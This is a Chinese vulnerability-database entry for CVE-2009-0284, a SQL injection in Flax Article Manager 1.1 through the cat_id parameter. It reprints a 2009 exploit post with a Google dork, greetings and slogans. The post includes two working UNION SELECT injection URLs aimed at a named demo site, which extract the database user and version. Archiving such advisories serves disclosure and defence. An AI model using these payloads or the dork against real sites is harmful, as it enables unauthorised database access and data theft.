flaxweb flax_article_manager SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117283 漏洞类型 SQL注入
发布时间 2009-01-25 更新时间 2009-06-03
CVE编号 CVE-2009-0284 CNNVD-ID CNNVD-200901-360
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7862
https://cxsecurity.com/issue/WLB-2009010217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-360
|漏洞详情
FlaxArticleManager1.1版本中的category.php存在SQL注入漏洞。远程攻击者可以借助cat_id参数,执行任意的SQL指令。
|漏洞EXP
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

# Author  : jiko

# email  : jalikom@hotmail.com

# Home   : www.no-exploit.Com

# Script  : http://www.clixint.com/products/articles -->Article Manager -->Price: $99 USD
              $99*10 Dh(maroc)=990Dh=19800 Real maghribi
# Dork: Copyright 2006 © Flax Article Manager v1.1

=========================[JAWAD Cha7ta 4 ever]===================

# Exploit  :

               http://no-exploit.com

            Demo:    

 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,user(),3,4,5--
 http://www.articlesitedemo.com/category.php?cat_id=3%20and%201=0%20union%20select%200,1,version(),3,4,5-- (V 4 :) )
 

Top: ( R07 T9awwad ) To str0ke & Milw0rM

 Cyber-Zone CHof Lfo9

=========================[Thanks To Allah ]===================
 Ma3aki ya GaZa رحم الله شهدائك


 greetz : all my friend and all No-exploit members and

 $ cyber-zone $ leopard $ Hassin X

 all muslims

 cyber-zone Wald Bladi B7al Khoya
-------------------------------------------------------------------------

  --          JIKO FroM No-exploit.Com        ---

-------------------------------------------------------------------------

------==        troops of Mohamed comming inchalah      =-----------------

Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2009-01-25]
|参考资料

来源:BID
名称:33422
链接:http://www.securityfocus.com/bid/33422
来源:MILW0RM
名称:7862
链接:http://www.milw0rm.com/exploits/7862
来源:www.flaxweb.com
链接:http://www.flaxweb.com/products/articles
来源:SECUNIA
名称:33625
链接:http://secunia.com/advisories/33625